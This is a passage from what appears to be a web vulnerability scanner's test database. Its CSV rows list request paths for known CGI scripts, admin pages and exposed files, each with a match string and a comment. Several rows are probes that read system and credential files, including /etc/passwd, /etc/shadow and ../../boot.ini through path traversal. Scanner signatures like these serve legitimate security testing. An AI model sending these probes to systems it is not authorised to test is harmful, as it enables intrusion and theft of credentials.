interesting.\",\"\",\"\"\n\"002039\",\"3092\",\"1\",\"@CGIDIRSstats-bin-p/reports/index.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002040\",\"3092\",\"1\",\"@CGIDIRSstats.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002041\",\"3092\",\"1\",\"@CGIDIRSstats.prf\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002042\",\"3092\",\"1\",\"@CGIDIRSstats/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002043\",\"3092\",\"1\",\"@CGIDIRSstatsconfig\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002044\",\"3092\",\"1\",\"@CGIDIRSstats_old/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002045\",\"3092\",\"1\",\"@CGIDIRSstatview.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002046\",\"3092\",\"1\",\"@CGIDIRSsurvey\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002047\",\"3092\",\"1\",\"@CGIDIRSsurvey.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002048\",\"3092\",\"1\",\"@CGIDIRStablebuild.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002049\",\"3092\",\"1\",\"@CGIDIRStcsh\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  possibly a system shell found.\",\"\",\"\"\n\"002050\",\"3092\",\"1\",\"@CGIDIRStest.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002051\",\"3092\",\"1\",\"@CGIDIRStest/test.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002052\",\"3092\",\"1\",\"@CGIDIRStextcounter.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002053\",\"3092\",\"1\",\"@CGIDIRStidfinder.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002054\",\"3092\",\"1\",\"@CGIDIRStigvote.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002055\",\"3092\",\"1\",\"@CGIDIRStpgnrock\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002056\",\"3092\",\"1\",\"@CGIDIRSultraboard.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002057\",\"3092\",\"1\",\"@CGIDIRSultraboard.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002058\",\"3092\",\"1\",\"@CGIDIRSviewlogs.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002059\",\"3092\",\"1\",\"@CGIDIRSvisitor.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002060\",\"3092\",\"1\",\"@CGIDIRSw3-msql\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002061\",\"3092\",\"1\",\"@CGIDIRSw3-sql\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002062\",\"3092\",\"1\",\"@CGIDIRSwebais\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002063\",\"3092\",\"1\",\"@CGIDIRSwebbbs.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002064\",\"3092\",\"1\",\"@CGIDIRSwebbbs.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002065\",\"3092\",\"1\",\"@CGIDIRSwebutil.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner. \",\"\",\"\"\n\"002066\",\"3092\",\"1\",\"@CGIDIRSwebutils.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner. \",\"\",\"\"\n\"002067\",\"3092\",\"1\",\"@CGIDIRSwebwho.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner. \",\"\",\"\"\n\"002068\",\"3092\",\"1\",\"@CGIDIRSwguest.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002069\",\"3092\",\"1\",\"@CGIDIRSwww-sql\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002070\",\"3092\",\"1\",\"@CGIDIRSwwwboard.cgi.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002071\",\"3092\",\"1\",\"@CGIDIRSwwwboard.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002072\",\"3092\",\"1\",\"@CGIDIRSwwwstats.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002073\",\"3092\",\"1\",\"@CGIDIRSwwwthreads/3tvars.pm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002074\",\"3092\",\"1\",\"@CGIDIRSwwwthreads/w3tvars.pm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002075\",\"3092\",\"1\",\"@CGIDIRSzsh\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  possibly a system shell found.\",\"\",\"\"\n\"002076\",\"13483\",\"12\",\"/adsamples/config/site.csc\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Contains SQL username/password\",\"\",\"\"\n\"002077\",\"3092\",\"1\",\"/advworks/equipment/catalog_type.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002078\",\"3092\",\"1\",\"/carbo.dll\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002079\",\"17670\",\"1\",\"/clocktower/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: Site Server sample files.\",\"\",\"\"\n\"002080\",\"3092\",\"1\",\"/localstart.asp\",\"GET\",\"You are not authorized\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002081\",\"17670\",\"1\",\"/market/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: Site Server sample files.\",\"\",\"\"\n\"002082\",\"17670\",\"1\",\"/mspress30/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: Site Server sample files.\",\"\",\"\"\n\"002083\",\"3092\",\"1\",\"/sam\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002084\",\"3092\",\"1\",\"/sam.bin\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002085\",\"3092\",\"1\",\"/sam._\",\"GET\",\"200\",\"\",\"\",\"Forbidden\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002086\",\"3092\",\"1\",\"/samples/search/queryhit.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002087\",\"3092\",\"1\",\"/scripts/counter.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002088\",\"17669\",\"76\",\"/scripts/cphost.dll\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"cphost.dll may have a DoS and a traversal issue.\",\"\",\"\"\n\"002089\",\"3092\",\"1\",\"/scripts/fpadmcgi.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002090\",\"3092\",\"1\",\"/scripts/postinfo.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002091\",\"3092\",\"1\",\"/scripts/samples/ctguestb.idc\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002092\",\"3092\",\"1\",\"/scripts/samples/search/webhits.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002093\",\"3092\",\"1\",\"/site/iissamples/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002094\",\"17670\",\"1\",\"/vc30/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: Site Server sample files.\",\"\",\"\"\n\"002095\",\"3092\",\"1\",\"/_mem_bin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: user login\",\"\",\"\"\n\"002096\",\"3092\",\"1\",\"/_mem_bin/FormsLogin.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: user login\",\"\",\"\"\n\"002097\",\"3092\",\"1\",\"/perl/files.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002098\",\"3092\",\"1\",\"/perl5/files.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002099\",\"3092\",\"1\",\"/scripts/convert.bas\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002100\",\"3092\",\"1\",\"/owa_util%2esignature\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002101\",\"3233\",\"1\",\"/cgi-dos/args.bat\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default FrontPage CGI found.\",\"\",\"\"\n\"002102\",\"3092\",\"1\",\"/custdata/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This may be COWS (CGI Online Worldweb Shopping), and may be interesting...\",\"\",\"\"\n\"002103\",\"3092\",\"1\",\"/hostingcontroller/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: probably HostingController, www.hostingcontroller.com\",\"\",\"\"\n\"002104\",\"3092\",\"2\",\"/data.sql\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Database SQL?\",\"\",\"\"\n\"002105\",\"3092\",\"2\",\"/databases/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Databases? Really??\",\"\",\"\"\n\"002106\",\"3092\",\"2\",\"/databse.sql\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Database SQL?\",\"\",\"\"\n\"002107\",\"3092\",\"2\",\"/db.sql\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Database SQL?\",\"\",\"\"\n\"002108\",\"3092\",\"2\",\"/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"An '/etc/passwd' file is available via the web site.\",\"\",\"\"\n\"002109\",\"3092\",\"2\",\"/img-sys/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default image directory should not allow directory listing.\",\"\",\"\"\n\"002110\",\"3092\",\"2\",\"/java-sys/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default Java directory should not allow directory listing.\",\"\",\"\"\n\"002111\",\"3092\",\"2\",\"/javadoc/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Documentation...?\",\"\",\"\"\n\"002112\",\"3092\",\"2\",\"/log/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Ahh...log information...fun!\",\"\",\"\"\n\"002113\",\"3092\",\"2\",\"/manager/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"May be a web server or site manager.\",\"\",\"\"\n\"002114\",\"3092\",\"2\",\"/manual/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Web server manual found.\",\"\",\"\"\n\"002115\",\"3092\",\"2\",\"/exchange/\",\"GET\",\"401\",\"\",\"\",\"\",\"\",\"This might be interesting: Outlook/Exchange OWA.\",\"\",\"\"\n\"002116\",\"3092\",\"3\",\"/pls/admin\",\"GET\",\"ENVIRONMENT\",\"\",\"\",\"\",\"\",\"Oracle Apache+WebDB gives a lot of system information via the pls/admin script\",\"\",\"\"\n\"002265\",\"3093\",\"1\",\"/finance.xls\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Finance spreadsheet?\",\"\",\"\"\n\"002266\",\"3093\",\"1\",\"/finances.xls\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Finance spreadsheet?\",\"\",\"\"\n\"002267\",\"3093\",\"1\",\"/abonnement.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002268\",\"3093\",\"1\",\"/acartpath/signin.asp?|-|0|404_Object_Not_Found\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002269\",\"3093\",\"1\",\"/add_acl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002270\",\"3093\",\"1\",\"/admbrowse.php?down=1&amp;cur=%2Fetc%2F&amp;dest=passwd&amp;rid=1&amp;S=[someid]\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002271\",\"3093\",\"1\",\"/admin/auth.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002272\",\"3093\",\"1\",\"/admin/cfg/configscreen.inc.php+\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002273\",\"3093\",\"1\",\"/admin/cfg/configsite.inc.php+\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002274\",\"3093\",\"1\",\"/admin/cfg/configsql.inc.php+\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002275\",\"3093\",\"1\",\"/admin/cfg/configtache.inc.php+\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002276\",\"3093\",\"1\",\"/admin/cms/htmltags.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002277\",\"3093\",\"1\",\"/admin/credit_card_info.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002278\",\"3093\",\"1\",\"/admin/exec.php3\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002279\",\"3093\",\"1\",\"/admin/index.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002280\",\"3093\",\"1\",\"/admin/modules/cache.php+\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002281\",\"3093\",\"1\",\"/admin/objects.inc.php4\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002282\",\"3093\",\"1\",\"/admin/script.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002283\",\"3093\",\"1\",\"/admin/settings.inc.php+\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002284\",\"3093\",\"1\",\"/admin/templates/header.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002285\",\"3093\",\"1\",\"/admin/upload.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002286\",\"3093\",\"1\",\"/admin_t/include/aff_liste_langue.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002287\",\"3093\",\"1\",\"/adv/gm001-mc/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002288\",\"3093\",\"1\",\"/aff_news.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002289\",\"3093\",\"1\",\"/approval/ts_app.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002290\",\"3093\",\"1\",\"/archive.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002291\",\"3093\",\"1\",\"/archive_forum.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002292\",\"3093\",\"1\",\"/ashnews.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002293\",\"3093\",\"1\",\"/auth.inc.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002294\",\"3093\",\"1\",\"/b2-tools/gm-2-b2.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002295\",\"3093\",\"1\",\"/bandwidth/index.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002296\",\"3093\",\"1\",\"/basilix.php3\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002297\",\"3093\",\"1\",\"/bigsam_guestbook.php?displayBegin=9999...9999\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002298\",\"3093\",\"1\",\"/bin/common/user_update_passwd.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002299\",\"3093\",\"1\",\"/biztalktracking/RawCustomSearchField.asp?|-|0|404_Object_Not_Found\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002300\",\"3093\",\"1\",\"/biztalktracking/rawdocdata.asp?|-|0|404_Object_Not_Found\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002301\",\"3093\",\"1\",\"/board/index.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002302\",\"3093\",\"1\",\"/board/philboard_admin.asp+\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002303\",\"3093\",\"1\",\"/boilerplate.asp?NFuse_Template=../../boot.ini&amp;NFuse_CurrentFolder=/SSLx0020Directories|-|0|404_Object_Not_Found\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002304\",\"3093\",\"1\",\"/bugtest+/+\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002305\",\"3093\",\"1\",\"/caupo/admin/admin_workspace.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002306\",\"3093\",\"1\",\"/ccbill/whereami.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002307\",\"3093\",\"1\",\"/chat_dir/register.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002308\",\"3093\",\"1\",\"/checkout_payment.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002309\",\"3093\",\"1\",\"/communique.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002310\",\"3093\",\"1\",\"/community/forumdisplay.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002311\",\"3093\",\"1\",\"/community/index.php?analized=anything\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002312\",\"3093\",\"1\",\"/community/member.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002313\",\"3093\",\"1\",\"/compte.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002314\",\"3093\",\"1\",\"/config/html/cnf_gi.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002315\",\"3093\",\"1\",\"/convert-date.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002316\",\"3093\",\"1\",\"/cp/rac/nsManager.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002317\",\"3093\",\"3a\",\"/CSNews.cgi?command=viewnews&database=none\",\"GET\",\"ENV\",\"\",\"\",\"\",\"\",\"csNews reveals system path and other sensitive information in error messages. Also may be possible to bypass authentication mechanism.\",\"\",\"\"\n\"002318\",\"3093\",\"1\",\"/csPassword.cgi?command=remove%20\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002319\",\"3093\",\"1\",\"/cutenews/comments.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002320\",\"3093\",\"1\",\"/cutenews/search.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002321\",\"3093\",\"1\",\"/cutenews/shownews.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002322\",\"3093\",\"1\",\"/Data/settings.xml+\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002323\",\"3093\",\"1\",\"/database/metacart.mdb+\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002324\",\"3093\",\"1\",\"/db.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002325\",\"3093\",\"1\",\"/dbabble\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002326\",\"3093\",\"1\",\"/dcp/advertiser.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002327\",\"3093\",\"1\",\"/defines.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002328\",\"3093\",\"1\",\"/dltclnt.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002329\",\"3093\",\"1\",\"/doc/admin/index.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002330\",\"3093\",\"1\",\"/docs/NED\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002331\",\"3093\",\"1\",\"/dotproject/modules/files/index_table.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002332\",\"3093\",\"1\",\"/dotproject/modules/projects/addedit.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002333\",\"3093\",\"1\",\"/dotproject/modules/projects/view.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002334\",\"3093\",\"1\",\"/dotproject/modules/projects/vw_files.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002335\",\"3093\",\"1\",\"/dotproject/modules/tasks/addedit.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002336\",\"3093\",\"1\",\"/dotproject/modules/tasks/viewgantt.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002337\",\"3093\",\"1\",\"/do_map\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002338\",\"3093\",\"1\",\"/do_subscribe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002339\",\"3093\",\"1\",\"/email.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002340\",\"3093\",\"1\",\"/emml_email_func.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002341\",\"3093\",\"1\",\"/emumail.cgi?type=.%00\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002342\",\"3093\",\"1\",\"/entete.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002343\",\"3093\",\"1\",\"/enteteacceuil.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002344\",\"3093\",\"1\",\"/etc/shadow+\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002345\",\"3093\",\"1\",\"/eventcal2.php.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002346\",\"3093\",\"1\",\"/ez2000/ezadmin.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002347\",\"3093\",\"1\",\"/ez2000/ezboard.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002348\",\"3093\",\"1\",\"/ez2000/ezman.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002349\",\"3093\",\"1\",\"/faqman/index.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown 